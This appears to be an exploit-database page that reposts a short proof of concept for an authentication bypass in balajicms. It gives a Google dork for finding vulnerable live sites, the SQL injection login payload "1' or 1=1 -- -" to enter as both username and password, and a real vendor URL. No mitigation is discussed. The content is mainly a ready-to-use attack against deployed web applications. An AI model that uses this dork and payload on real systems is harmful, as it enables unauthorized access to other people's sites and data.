Advertisement






balajicms Auth by pass Vulnerability

CVE Category Price Severity
CVE-2021-38387 CWE-285 $500 Critical
Author Risk Exploitation Type Date
Anonymous High Remote 2020-04-04
CPE
cpe:cpe:2.3:a:balajicms:balajicms:*:*:*:*:*:*:*:*
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2020040020

Below is a copy:

balajicms Auth by pass Vulnerability
====================================================================================================================================
| # Title     : balajicms Auth by pass Vulnerability                                                                               |
| # Author    : indoushka                                                                                                          |
| # Tested on : windows 10 Franais V.(Pro) / browser : Mozilla firefox 66.0.3(32-bit)                                             | 
| # Vendor    : http://sbce.in/balajicms/                                                                                          |  
| # Dork      : Copyright  KAAHGO INFOTECH | GRIEVANCES REDRESSAL CELL                                                            | 
====================================================================================================================================

poc :


[+] Dorking n Google Or Other Search Enggine.

[+] Use payload : user & pass = 1' or 1=1 -- -

[+] http://sbce.in/balajicms/

==Greetings to :=========================================================================================================================
|                                                                                                                                       |
| jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* thelastvvv *Zigoo.eg * moncet              |
|                                                                                                                                       |
=========================================================================================================================================

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.